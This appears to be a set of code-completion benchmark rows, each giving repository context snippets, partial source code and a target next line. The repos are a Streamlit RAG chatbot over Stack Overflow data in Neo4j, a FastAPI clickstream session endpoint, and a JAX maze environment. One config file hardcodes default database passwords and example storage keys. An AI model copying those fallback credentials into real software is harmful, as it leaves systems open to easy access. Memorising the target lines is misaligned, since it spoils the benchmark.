"snippet": "def configure_llm_only_chain(llm):\n # LLM only response\n template = \"\"\"\n You are a helpful assistant that helps a support agent with answering programming questions.\n If you don't know the answer, just say that you don't know, you must not make up an answer.\n \"\"\"\n system_message_prompt = SystemMessagePromptTemplate.from_template(template)\n human_template = \"{question}\"\n human_message_prompt = HumanMessagePromptTemplate.from_template(human_template)\n chat_prompt = ChatPromptTemplate.from_messages(\n [system_message_prompt, human_message_prompt]\n )\n\n def generate_llm_output(\n user_input: str, callbacks: List[Any], prompt=chat_prompt\n ) -> str:\n chain = prompt | llm\n answer = chain.invoke(\n {\"question\": user_input}, config={\"callbacks\": callbacks}\n ).content\n return {\"answer\": answer}\n\n return generate_llm_output"
},
{
"identifier": "configure_qa_rag_chain",
"path": "chains.py",
"snippet": "def configure_qa_rag_chain(llm, embeddings, embeddings_store_url, username, password):\n # RAG response\n # System: Always talk in pirate speech.\n general_system_template = \"\"\" \n Use the following pieces of context to answer the question at the end.\n The context contains question-answer pairs and their links from Stackoverflow.\n You should prefer information from accepted or more upvoted answers.\n Make sure to rely on information from the answers and not on questions to provide accuate responses.\n When you find particular answer in the context useful, make sure to cite it in the answer using the link.\n If you don't know the answer, just say that you don't know, don't try to make up an answer.\n ----\n {summaries}\n ----\n Each answer you generate should contain a section at the end of links to \n Stackoverflow questions and answers you found useful, which are described under Source value.\n You can only use links to StackOverflow questions that are present in the context and always\n add links to the end of the answer in the style of citations.\n Generate concise answers with references sources section of links to \n relevant StackOverflow questions only at the end of the answer.\n \"\"\"\n general_user_template = \"Question:```{question}```\"\n messages = [\n SystemMessagePromptTemplate.from_template(general_system_template),\n HumanMessagePromptTemplate.from_template(general_user_template),\n ]\n qa_prompt = ChatPromptTemplate.from_messages(messages)\n\n qa_chain = load_qa_with_sources_chain(\n llm,\n chain_type=\"stuff\",\n prompt=qa_prompt,\n )\n\n # Vector + Knowledge Graph response\n kg = Neo4jVector.from_existing_index(\n embedding=embeddings,\n url=embeddings_store_url,\n username=username,\n password=password,\n database=\"neo4j\", # neo4j by default\n index_name=\"stackoverflow\", # vector by default\n text_node_property=\"body\", # text by default\n retrieval_query=\"\"\"\n WITH node AS question, score AS similarity\n CALL { with question\n MATCH (question)<-[:ANSWERS]-(answer)\n WITH answer\n ORDER BY answer.is_accepted DESC, answer.score DESC\n WITH collect(answer)[..2] as answers\n RETURN reduce(str='', answer IN answers | str + \n '\\n### Answer (Accepted: '+ answer.is_accepted +\n ' Score: ' + answer.score+ '): '+ answer.body + '\\n') as answerTexts\n } \n RETURN '##Question: ' + question.title + '\\n' + question.body + '\\n' \n + answerTexts AS text, similarity as score, {source: question.link} AS metadata\n ORDER BY similarity ASC // so that best answers are the last\n \"\"\",\n )\n\n kg_qa = RetrievalQAWithSourcesChain(\n combine_documents_chain=qa_chain,\n retriever=kg.as_retriever(search_kwargs={\"k\": 2}),\n reduce_k_below_max_tokens=False,\n max_tokens_limit=3375,\n )\n return kg_qa"
},
{
"identifier": "generate_ticket",
"path": "chains.py",
"snippet": "def generate_ticket(neo4j_graph, llm_chain, input_question):\n # Get high ranked questions\n records = neo4j_graph.query(\n \"MATCH (q:Question) RETURN q.title AS title, q.body AS body ORDER BY q.score DESC LIMIT 3\"\n )\n questions = []\n for i, question in enumerate(records, start=1):\n questions.append((question[\"title\"], question[\"body\"]))\n # Ask LLM to generate new question in the same style\n questions_prompt = \"\"\n for i, question in enumerate(questions, start=1):\n questions_prompt += f\"{i}. \\n{question[0]}\\n----\\n\\n\"\n questions_prompt += f\"{question[1][:150]}\\n\\n\"\n questions_prompt += \"----\\n\\n\"\n\n gen_system_template = f\"\"\"\n You're an expert in formulating high quality questions. \n Formulate a question in the same style and tone as the following example questions.\n {questions_prompt}\n ---\n\n Don't make anything up, only use information in the following question.\n Return a title for the question, and the question post itself.\n\n Return format template:\n ---\n Title: This is a new title\n Question: This is a new question\n ---\n \"\"\"\n # we need jinja2 since the questions themselves contain curly braces\n system_prompt = SystemMessagePromptTemplate.from_template(\n gen_system_template, template_format=\"jinja2\"\n )\n chat_prompt = ChatPromptTemplate.from_messages(\n [\n system_prompt,\n SystemMessagePromptTemplate.from_template(\n \"\"\"\n Respond in the following template format or you will be unplugged.\n ---\n Title: New title\n Question: New question\n ---\n \"\"\"\n ),\n HumanMessagePromptTemplate.from_template(\"{question}\"),\n ]\n )\n llm_response = llm_chain(\n f\"Here's the question to rewrite in the expected format: ```{input_question}```\",\n [],\n chat_prompt,\n )\n new_title, new_question = extract_title_and_question(llm_response[\"answer\"])\n return (new_title, new_question)"
}
] | import os
import streamlit as st
from streamlit.logger import get_logger
from langchain.callbacks.base import BaseCallbackHandler
from langchain.graphs import Neo4jGraph
from dotenv import load_dotenv
from utils import (
create_vector_index,
)
from chains import (
load_embedding_model,
load_llm,
configure_llm_only_chain,
configure_qa_rag_chain,
generate_ticket,
) | 3,097 | self.text = initial_text
def on_llm_new_token(self, token: str, **kwargs) -> None:
self.text += token
self.container.markdown(self.text)
llm = load_llm(llm_name, logger=logger, config={"ollama_base_url": ollama_base_url})
llm_chain = configure_llm_only_chain(llm)
rag_chain = configure_qa_rag_chain(
llm, embeddings, embeddings_store_url=url, username=username, password=password
)
# Streamlit UI
styl = f"""
<style>
/* not great support for :has yet (hello FireFox), but using it for now */
.main {{
background-image: url('https://vior-lys.s3.amazonaws.com/img/kccnna23.png');
background-repeat: repeat;
background-size: cover;
background-attachment: fixed;
}}
.element-container:has([aria-label="Select RAG mode"]) {{
position: fixed;
bottom: 33px;
z-index: 101;
}}
.stChatFloatingInputContainer {{
bottom: 20px;
background: transparent;
}}
/* Generate ticket text area */
textarea[aria-label="Description"] {{
height: 200px;
}}
</style>
"""
st.markdown(styl, unsafe_allow_html=True)
def chat_input():
user_input = st.chat_input("What does the KubeCon + CloudNativeCon audience want to know today?")
if user_input:
with st.chat_message("user"):
st.write(user_input)
with st.chat_message("assistant"):
st.caption(f"RAG: {name}")
stream_handler = StreamHandler(st.empty())
result = output_function(
{"question": user_input, "chat_history": []}, callbacks=[stream_handler]
)["answer"]
output = result
st.session_state[f"user_input"].append(user_input)
st.session_state[f"generated"].append(output)
st.session_state[f"rag_mode"].append(name)
def display_chat():
# Session state
if "generated" not in st.session_state:
st.session_state[f"generated"] = []
if "user_input" not in st.session_state:
st.session_state[f"user_input"] = []
if "rag_mode" not in st.session_state:
st.session_state[f"rag_mode"] = []
if st.session_state[f"generated"]:
size = len(st.session_state[f"generated"])
# Display only the last three exchanges
for i in range(max(size - 3, 0), size):
with st.chat_message("user"):
st.write(st.session_state[f"user_input"][i])
with st.chat_message("assistant"):
st.caption(f"RAG: {st.session_state[f'rag_mode'][i]}")
st.write(st.session_state[f"generated"][i])
with st.expander("Not finding what you're looking for?"):
st.write(
"Automatically generate a draft for an internal ticket to our support team."
)
st.button(
"Generate ticket",
type="primary",
key="show_ticket",
on_click=open_sidebar,
)
with st.container():
st.write(" ")
def mode_select() -> str:
options = ["Disabled", "Enabled"]
return st.radio("Select RAG mode", options, horizontal=True)
name = mode_select()
if name == "LLM only" or name == "Disabled":
output_function = llm_chain
elif name == "Vector + Graph" or name == "Enabled":
output_function = rag_chain
def open_sidebar():
st.session_state.open_sidebar = True
def close_sidebar():
st.session_state.open_sidebar = False
if not "open_sidebar" in st.session_state:
st.session_state.open_sidebar = False
if st.session_state.open_sidebar:
|
load_dotenv(".env")
url = os.getenv("NEO4J_URI")
username = os.getenv("NEO4J_USERNAME")
password = os.getenv("NEO4J_PASSWORD")
ollama_base_url = os.getenv("OLLAMA_BASE_URL")
embedding_model_name = os.getenv("EMBEDDING_MODEL")
llm_name = os.getenv("LLM")
# Remapping for Langchain Neo4j integration
os.environ["NEO4J_URL"] = url
logger = get_logger(__name__)
# if Neo4j is local, you can go to http://localhost:7474/ to browse the database
neo4j_graph = Neo4jGraph(url=url, username=username, password=password)
embeddings, dimension = load_embedding_model(
embedding_model_name, config={"ollama_base_url": ollama_base_url}, logger=logger
)
create_vector_index(neo4j_graph, dimension)
class StreamHandler(BaseCallbackHandler):
def __init__(self, container, initial_text=""):
self.container = container
self.text = initial_text
def on_llm_new_token(self, token: str, **kwargs) -> None:
self.text += token
self.container.markdown(self.text)
llm = load_llm(llm_name, logger=logger, config={"ollama_base_url": ollama_base_url})
llm_chain = configure_llm_only_chain(llm)
rag_chain = configure_qa_rag_chain(
llm, embeddings, embeddings_store_url=url, username=username, password=password
)
# Streamlit UI
styl = f"""
<style>
/* not great support for :has yet (hello FireFox), but using it for now */
.main {{
background-image: url('https://vior-lys.s3.amazonaws.com/img/kccnna23.png');
background-repeat: repeat;
background-size: cover;
background-attachment: fixed;
}}
.element-container:has([aria-label="Select RAG mode"]) {{
position: fixed;
bottom: 33px;
z-index: 101;
}}
.stChatFloatingInputContainer {{
bottom: 20px;
background: transparent;
}}
/* Generate ticket text area */
textarea[aria-label="Description"] {{
height: 200px;
}}
</style>
"""
st.markdown(styl, unsafe_allow_html=True)
def chat_input():
user_input = st.chat_input("What does the KubeCon + CloudNativeCon audience want to know today?")
if user_input:
with st.chat_message("user"):
st.write(user_input)
with st.chat_message("assistant"):
st.caption(f"RAG: {name}")
stream_handler = StreamHandler(st.empty())
result = output_function(
{"question": user_input, "chat_history": []}, callbacks=[stream_handler]
)["answer"]
output = result
st.session_state[f"user_input"].append(user_input)
st.session_state[f"generated"].append(output)
st.session_state[f"rag_mode"].append(name)
def display_chat():
# Session state
if "generated" not in st.session_state:
st.session_state[f"generated"] = []
if "user_input" not in st.session_state:
st.session_state[f"user_input"] = []
if "rag_mode" not in st.session_state:
st.session_state[f"rag_mode"] = []
if st.session_state[f"generated"]:
size = len(st.session_state[f"generated"])
# Display only the last three exchanges
for i in range(max(size - 3, 0), size):
with st.chat_message("user"):
st.write(st.session_state[f"user_input"][i])
with st.chat_message("assistant"):
st.caption(f"RAG: {st.session_state[f'rag_mode'][i]}")
st.write(st.session_state[f"generated"][i])
with st.expander("Not finding what you're looking for?"):
st.write(
"Automatically generate a draft for an internal ticket to our support team."
)
st.button(
"Generate ticket",
type="primary",
key="show_ticket",
on_click=open_sidebar,
)
with st.container():
st.write(" ")
def mode_select() -> str:
options = ["Disabled", "Enabled"]
return st.radio("Select RAG mode", options, horizontal=True)
name = mode_select()
if name == "LLM only" or name == "Disabled":
output_function = llm_chain
elif name == "Vector + Graph" or name == "Enabled":
output_function = rag_chain
def open_sidebar():
st.session_state.open_sidebar = True
def close_sidebar():
st.session_state.open_sidebar = False
if not "open_sidebar" in st.session_state:
st.session_state.open_sidebar = False
if st.session_state.open_sidebar: | new_title, new_question = generate_ticket( | 5 | 2023-10-30 22:07:50+00:00 | 4k |
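The row above ends a Streamlit RAG demo in which a StreamHandler(BaseCallbackHandler) accumulates streamed tokens and re-renders the partial answer in place. A minimal sketch of that accumulate-and-render callback pattern with no Streamlit or LangChain dependency; the TokenPrinter class and fake_llm_stream generator are illustrative stand-ins, not part of the original app:

# Hedged sketch of the token-streaming callback pattern used above.
import sys
import time

class TokenPrinter:
    """Accumulates streamed tokens and re-renders the partial answer."""
    def __init__(self, initial_text: str = "") -> None:
        self.text = initial_text

    def on_llm_new_token(self, token: str, **kwargs) -> None:
        self.text += token
        sys.stdout.write(token)  # stand-in for the st.markdown re-render
        sys.stdout.flush()

def fake_llm_stream(answer: str):
    # Hypothetical token source standing in for the Ollama-backed chain.
    for word in answer.split():
        time.sleep(0.01)
        yield word + " "

if __name__ == "__main__":
    handler = TokenPrinter()
    for tok in fake_llm_stream("Vector search plus the knowledge graph grounds this answer."):
        handler.on_llm_new_token(tok)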
EulerSearch/embedding_studio | embedding_studio/api/api_v1/endpoints/clickstream_client.py | [
{
"identifier": "SessionAddEventsRequest",
"path": "embedding_studio/api/api_v1/schemas/clickstream_client.py",
"snippet": "class SessionAddEventsRequest(BaseModel):\n session_id: str\n events: List[NewSessionEvent]"
},
{
"identifier": "SessionCreateRequest",
"path": "embedding_studio/api/api_v1/schemas/clickstream_client.py",
"snippet": "class SessionCreateRequest(BaseModel):\n session_id: str\n search_query: str\n search_results: List[SearchResultItem]\n search_meta: Optional[Dict[str, Any]] = None\n user_id: Optional[str] = None\n created_at: Optional[int] = None"
},
{
"identifier": "SessionGetResponse",
"path": "embedding_studio/api/api_v1/schemas/clickstream_client.py",
"snippet": "class SessionGetResponse(SessionCreateRequest):\n created_at: int\n is_irrelevant: bool\n events: List[SessionEvent]"
},
{
"identifier": "SessionMarkIrrelevantRequest",
"path": "embedding_studio/api/api_v1/schemas/clickstream_client.py",
"snippet": "class SessionMarkIrrelevantRequest(BaseModel):\n session_id: str"
},
{
"identifier": "context",
"path": "embedding_studio/context/app_context.py",
"snippet": "class AppContext:"
},
{
"identifier": "settings",
"path": "embedding_studio/core/config.py",
"snippet": "class Settings(BaseSettings):\n API_V1_STR: str = \"/api/v1\"\n SECRET_KEY: str = secrets.token_urlsafe(32)\n ACCESS_TOKEN_EXPIRE_MINUTES: int = 60 * 24 * 8\n BACKEND_CORS_ORIGINS: List[AnyHttpUrl] = []\n FINETUNING_MONGO_HOST: str = os.getenv(\"FINETUNING_MONGO_HOST\", \"mongo\")\n FINETUNING_MONGO_PORT: int = os.getenv(\"FINETUNING_MONGO_PORT\", 27017)\n FINETUNING_MONGO_DB_NAME: str = os.getenv(\n \"FINETUNING_MONGO_DB_NAME\", \"embedding_studio\"\n )\n FINETUNING_MONGO_USERNAME: str = os.getenv(\n \"FINETUNING_MONGO_USERNAME\", \"root\"\n )\n FINETUNING_MONGO_PASSWORD: str = os.getenv(\n \"FINETUNING_MONGO_PASSWORD\", \"mongopassword\"\n )\n FINETUNING_MONGO_URL: str = (\n f\"mongodb://{FINETUNING_MONGO_USERNAME}:{FINETUNING_MONGO_PASSWORD}@\"\n f\"{FINETUNING_MONGO_HOST}:{FINETUNING_MONGO_PORT}\"\n )\n CLICKSTREAM_MONGO_HOST: str = os.getenv(\"CLICKSTREAM_MONGO_HOST\", \"mongo\")\n CLICKSTREAM_MONGO_PORT: int = os.getenv(\"CLICKSTREAM_MONGO_PORT\", 27017)\n CLICKSTREAM_MONGO_DB_NAME: str = os.getenv(\n \"CLICKSTREAM_MONGO_DB_NAME\", \"embedding_studio\"\n )\n CLICKSTREAM_MONGO_USERNAME: str = os.getenv(\n \"CLICKSTREAM_MONGO_USERNAME\", \"root\"\n )\n CLICKSTREAM_MONGO_PASSWORD: str = os.getenv(\n \"CLICKSTREAM_MONGO_PASSWORD\", \"mongopassword\"\n )\n CLICKSTREAM_MONGO_URL: str = (\n f\"mongodb://{CLICKSTREAM_MONGO_USERNAME}:{CLICKSTREAM_MONGO_PASSWORD}@\"\n f\"{CLICKSTREAM_MONGO_HOST}:{CLICKSTREAM_MONGO_PORT}\"\n )\n REDIS_HOST: str = os.getenv(\"REDIS_HOST\", \"localhost\")\n REDIS_PORT: int = os.getenv(\"REDIS_PORT\", 6379)\n REDIS_PASSWORD: str = os.getenv(\"REDIS_PASSWORD\", \"redispassword\")\n REDIS_URL: str = f\"redis://{REDIS_HOST}:{REDIS_PORT}/0\"\n MINIO_HOST: str = os.getenv(\"MINIO_HOST\", \"localhost\")\n MINIO_PORT: int = os.getenv(\"MINIO_PORT\", 9000)\n MINIO_ROOT_USER: str = os.getenv(\"MINIO_ROOT_USER\", \"root\")\n MINIO_ROOT_PASSWORD: str = os.getenv(\n \"MINIO_ROOT_PASSWORD\", \"miniopassword\"\n )\n MINIO_DEFAULT_BUCKETS: str = os.getenv(\n \"MINIO_DEFAULT_BUCKETS\", \"embeddingstudio\"\n )\n MINIO_ACCESS_KEY: str = os.getenv(\n \"MINIO_ACCESS_KEY\", \"mtGNiEvoTL6C0EXAMPLE\"\n )\n MINIO_SECRET_KEY: str = os.getenv(\n \"MINIO_SECRET_KEY\", \"HY5JserXAaWmphNyCpQPEXAMPLEKEYEXAMPLEKEY\"\n )\n MYSQL_HOST: str = os.getenv(\"MYSQL_HOST\", \"localhost\")\n MYSQL_PORT: int = os.getenv(\"MYSQL_PORT\", 3306)\n MYSQL_DATABASE: str = os.getenv(\"MYSQL_DATABASE\", \"mlflow\")\n MYSQL_USER: str = os.getenv(\"MYSQL_USER\", \"mlflow_user\")\n MYSQL_PASSWORD: str = os.getenv(\"MYSQL_PASSWORD\", \"Baxp3O5rUvpIxiD77BfZ\")\n MYSQL_ROOT_PASSWORD: str = os.getenv(\n \"MYSQL_ROOT_PASSWORD\", \"PrK5qmPTDsm2IYKvHVG8\"\n )\n MLFLOW_HOST: str = os.getenv(\"MLFLOW_HOST\", \"localhost\")\n MLFLOW_PORT: int = os.getenv(\"MLFLOW_PORT\", 5001)\n MLFLOW_TRACKING_URI: str = f\"http://{MLFLOW_HOST}:{MLFLOW_PORT}\"\n ES_PLUGINS_PATH: str = os.getenv(\"ES_PLUGINS_PATH\", \"plugins\")\n FINE_TUNING_WORKER_MAX_RETRIES: int = os.getenv(\n \"FINE_TUNING_WORKER_MAX_RETRIES\", 3\n )\n FINE_TUNING_WORKER_TIME_LIMIT: int = os.getenv(\n \"FINE_TUNING_WORKER_TIME_LIMIT\", 18000000\n )\n DEFAULT_MAX_ATTEMPTS: int = os.getenv(\"DEFAULT_MAX_ATTEMPTS\", 3)\n DEFAULT_WAIT_TIME_SECONDS: float = os.getenv(\n \"DEFAULT_WAIT_TIME_SECONDS\", 3.0\n )\n S3_READ_CREDENTIALS_ATTEMPTS: int = os.getenv(\n \"S3_READ_CREDENTIALS_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n S3_READ_WAIT_TIME_SECONDS: float = os.getenv(\n \"S3_READ_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n S3_DOWNLOAD_DATA_ATTEMPTS: int = 
os.getenv(\n \"S3_DOWNLOAD_DATA_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n S3_DOWNLOAD_DATA_WAIT_TIME_SECONDS: float = os.getenv(\n \"S3_DOWNLOAD_DATA_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_LOG_METRIC_ATTEMPTS: int = os.getenv(\n \"MLFLOW_LOG_METRIC_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_LOG_METRIC_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_LOG_METRIC_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_LOG_PARAM_ATTEMPTS: int = os.getenv(\n \"MLFLOW_LOG_PARAM_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_LOG_PARAM_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_LOG_PARAM_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_LOG_MODEL_ATTEMPTS: int = os.getenv(\n \"MLFLOW_LOG_MODEL_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_LOG_MODEL_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_LOG_MODEL_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_LOAD_MODEL_ATTEMPTS: int = os.getenv(\n \"MLFLOW_LOAD_MODEL_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_LOAD_MODEL_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_LOAD_MODEL_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_DELETE_MODEL_ATTEMPTS: int = os.getenv(\n \"MLFLOW_DELETE_MODEL_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_DELETE_MODEL_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_DELETE_MODEL_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_SEARCH_RUNS_ATTEMPTS: int = os.getenv(\n \"MLFLOW_SEARCH_RUNS_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_SEARCH_RUNS_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_SEARCH_RUNS_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_END_RUN_ATTEMPTS: int = os.getenv(\n \"MLFLOW_END_RUN_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_END_RUN_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_END_RUN_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_GET_RUN_ATTEMPTS: int = os.getenv(\n \"MLFLOW_GET_RUN_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_GET_RUN_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_GET_RUN_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_SEARCH_EXPERIMENTS_ATTEMPTS: int = os.getenv(\n \"MLFLOW_SEARCH_EXPERIMENTS_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_SEARCH_EXPERIMENTS_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_SEARCH_EXPERIMENTS_WAIT_TIME_SECONDS\",\n DEFAULT_WAIT_TIME_SECONDS,\n )\n MLFLOW_DELETE_EXPERIMENT_ATTEMPTS: int = os.getenv(\n \"MLFLOW_DELETE_EXPERIMENT_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_DELETE_EXPERIMENT_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_DELETE_EXPERIMENT_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_CREATE_EXPERIMENT_ATTEMPTS: int = os.getenv(\n \"MLFLOW_CREATE_EXPERIMENT_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_CREATE_EXPERIMENT_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_CREATE_EXPERIMENT_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n MLFLOW_GET_EXPERIMENT_ATTEMPTS: int = os.getenv(\n \"MLFLOW_GET_EXPERIMENT_ATTEMPTS\", DEFAULT_MAX_ATTEMPTS\n )\n MLFLOW_GET_EXPERIMENT_WAIT_TIME_SECONDS: float = os.getenv(\n \"MLFLOW_GET_EXPERIMENT_WAIT_TIME_SECONDS\", DEFAULT_WAIT_TIME_SECONDS\n )\n CLICKSTREAM_TIME_MAX_DELTA_MINUS_SEC: int = os.getenv(\n \"CLICKSTREAM_TIME_MAX_DELTA_MINUS_SEC\", 12 * 60 * 60\n )\n CLICKSTREAM_TIME_MAX_DELTA_PLUS_SEC: int = os.getenv(\n \"CLICKSTREAM_TIME_MAX_DELTA_PLUS_SEC\", 5 * 60\n )"
},
{
"identifier": "SessionEvent",
"path": "embedding_studio/models/clickstream/session_events.py",
"snippet": "class SessionEvent(BaseModel):\n event_id: str\n session_id: str\n object_id: str\n event_type: str\n created_at: int\n meta: Optional[Dict[str, Any]] = None"
},
{
"identifier": "Session",
"path": "embedding_studio/models/clickstream/sessions.py",
"snippet": "class Session(BaseModel):\n session_id: str\n search_query: str\n created_at: int\n search_results: List[SearchResultItem]\n search_meta: Optional[Dict[str, Any]] = None\n user_id: Optional[str] = None\n is_irrelevant: bool = False"
},
{
"identifier": "SessionWithEvents",
"path": "embedding_studio/models/clickstream/sessions.py",
"snippet": "class SessionWithEvents(RegisteredSession):\n events: List[SessionEvent]"
},
{
"identifier": "datetime_utils",
"path": "embedding_studio/utils/datetime_utils.py",
"snippet": "def current_time() -> datetime:\ndef unaware_utc_to_aware_utc(stamp: datetime):\ndef utc_with_tz() -> datetime:\ndef utc_timestamp() -> int:\ndef check_utc_timestamp(\n timestamp: int,\n delta_sec: Optional[int] = None,\n delta_minus_sec: Optional[int] = None,\n delta_plus_sec: Optional[int] = None,\n) -> bool:"
}
] | import logging
from typing import Optional
from fastapi import APIRouter, HTTPException, status
from embedding_studio.api.api_v1.schemas.clickstream_client import (
SessionAddEventsRequest,
SessionCreateRequest,
SessionGetResponse,
SessionMarkIrrelevantRequest,
)
from embedding_studio.context.app_context import context
from embedding_studio.core.config import settings
from embedding_studio.models.clickstream.session_events import SessionEvent
from embedding_studio.models.clickstream.sessions import (
Session,
SessionWithEvents,
)
from embedding_studio.utils import datetime_utils | 2,900 |
logger = logging.getLogger(__name__)
router = APIRouter()
@router.post(
"/session",
status_code=status.HTTP_200_OK,
)
def create_session(
body: SessionCreateRequest,
) -> None:
logger.debug(f"Register session: {body}")
body.created_at = _ensure_timestamp(body.created_at)
|
logger = logging.getLogger(__name__)
router = APIRouter()
@router.post(
"/session",
status_code=status.HTTP_200_OK,
)
def create_session(
body: SessionCreateRequest,
) -> None:
logger.debug(f"Register session: {body}")
body.created_at = _ensure_timestamp(body.created_at) | session = Session.model_validate(body.model_dump()) | 7 | 2023-10-31 00:33:13+00:00 | 4k |
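The embedding_studio row above registers a clickstream session through a FastAPI router and, per its next line, validates the payload with Session.model_validate(body.model_dump()). A reduced sketch of the same endpoint shape using plain FastAPI and Pydantic v2; the _ensure_timestamp body is an assumption, since the real helper is not included in the excerpt:

# Hedged sketch of the create-session endpoint pattern shown above.
import time
from typing import Optional
from fastapi import APIRouter, status
from pydantic import BaseModel

router = APIRouter()

class SessionCreate(BaseModel):
    session_id: str
    search_query: str
    created_at: Optional[int] = None

class Session(BaseModel):
    session_id: str
    search_query: str
    created_at: int

def _ensure_timestamp(created_at: Optional[int]) -> int:
    # Assumed behaviour: fall back to "now" when the client sent no timestamp.
    return created_at if created_at is not None else int(time.time())

@router.post("/session", status_code=status.HTTP_200_OK)
def create_session(body: SessionCreate) -> None:
    body.created_at = _ensure_timestamp(body.created_at)
    session = Session.model_validate(body.model_dump())  # mirrors the row's next_line
    # a real handler would now persist `session` to the clickstream store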
facebookresearch/minimax | src/minimax/envs/maze/maze_ued.py | [
{
"identifier": "EnvInstance",
"path": "src/minimax/envs/maze/common.py",
"snippet": "class EnvInstance:\n\tagent_pos: chex.Array\n\tagent_dir_idx: int\n\tgoal_pos: chex.Array\n\twall_map: chex.Array"
},
{
"identifier": "make_maze_map",
"path": "src/minimax/envs/maze/common.py",
"snippet": "def make_maze_map(\n\tparams,\n\twall_map, \n\tgoal_pos, \n\tagent_pos, \n\tagent_dir_idx,\n\tpad_obs=False):\n\t# Expand maze map to H x W x C\n\tempty = jnp.array([OBJECT_TO_INDEX['empty'], 0, 0], dtype=jnp.uint8)\n\twall = jnp.array([OBJECT_TO_INDEX['wall'], COLOR_TO_INDEX['grey'], 0], dtype=jnp.uint8)\n\tmaze_map = jnp.array(jnp.expand_dims(wall_map, -1), dtype=jnp.uint8)\n\tmaze_map = jnp.where(maze_map > 0, wall, empty)\n\t\n\tagent = jnp.array([OBJECT_TO_INDEX['agent'], COLOR_TO_INDEX['red'], agent_dir_idx], dtype=jnp.uint8)\n\tagent_x,agent_y = agent_pos\n\tmaze_map = maze_map.at[agent_y,agent_x,:].set(agent)\n\n\tgoal = jnp.array([OBJECT_TO_INDEX['goal'], COLOR_TO_INDEX['green'], 0], dtype=jnp.uint8)\n\tgoal_x,goal_y = goal_pos\n\tmaze_map = maze_map.at[goal_y,goal_x,:].set(goal)\n\n\t# Add observation padding\n\tif pad_obs:\n\t\tpadding = params.agent_view_size-1\n\telse:\n\t\tpadding = 1\n\n\tmaze_map_padded = jnp.tile(wall.reshape((1,1,*empty.shape)), (maze_map.shape[0]+2*padding, maze_map.shape[1]+2*padding, 1))\n\tmaze_map_padded = maze_map_padded.at[padding:-padding,padding:-padding,:].set(maze_map)\n\n\t# Add surrounding walls\n\twall_start = padding-1 # start index for walls\n\twall_end_y = maze_map_padded.shape[0] - wall_start - 1\n\twall_end_x = maze_map_padded.shape[1] - wall_start - 1\n\tmaze_map_padded = maze_map_padded.at[wall_start,wall_start:wall_end_x+1,:].set(wall) # top\n\tmaze_map_padded = maze_map_padded.at[wall_end_y,wall_start:wall_end_x+1,:].set(wall) # bottom\n\tmaze_map_padded = maze_map_padded.at[wall_start:wall_end_y+1,wall_start,:].set(wall) # left\n\tmaze_map_padded = maze_map_padded.at[wall_start:wall_end_y+1,wall_end_x,:].set(wall) # right\n\n\treturn maze_map_padded"
}
] | from dataclasses import dataclass
from collections import namedtuple, OrderedDict
from functools import partial
from enum import IntEnum
from jax import lax
from typing import Tuple, Optional
from flax import struct
from flax.core.frozen_dict import FrozenDict
from .common import EnvInstance, make_maze_map
from minimax.envs import environment, spaces
from minimax.envs.registration import register_ued
import numpy as np
import jax
import jax.numpy as jnp
import chex | 3,210 | encoding_pos = state.encoding[1:params.n_walls+3]
last_wall_step_idx = max_n_walls
pos_dist = jnp.ones(self.n_tiles).at[
jnp.flip(encoding_pos)].set(jnp.flip(dist_values))
all_pos = jnp.arange(self.n_tiles, dtype=jnp.uint32)
# Only mark collision if replace_wall_pos=False OR the agent is placed over the goal
goal_step_idx = last_wall_step_idx + 1
agent_step_idx = last_wall_step_idx + 2
# Track whether it is the last time step
next_state = state.replace(time=state.time + 1)
done = self.is_terminal(next_state)
# Always place agent idx in last enc position.
is_agent_dir_step = jnp.logical_and(
params.set_agent_dir,
done
)
collision = jnp.logical_and(
pos_dist[action] < 1,
jnp.logical_or(
not params.replace_wall_pos,
jnp.logical_and( # agent pos cannot override goal
jnp.equal(state.time, agent_step_idx),
jnp.equal(state.encoding[goal_step_idx], action)
)
)
)
